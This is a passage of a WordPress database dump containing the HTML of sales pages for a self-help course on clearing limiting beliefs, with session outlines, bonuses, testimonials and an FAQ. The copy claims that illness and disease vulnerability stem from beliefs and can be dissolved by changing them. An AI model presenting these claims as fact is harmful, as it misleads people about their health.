choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 16:28:10', '2014-12-12 21:28:10', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2026, 2, '2014-12-12 14:54:35', '2014-12-12 19:54:35', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n \n\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\n \n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n \n\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\n \n\n&nbsp;\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of 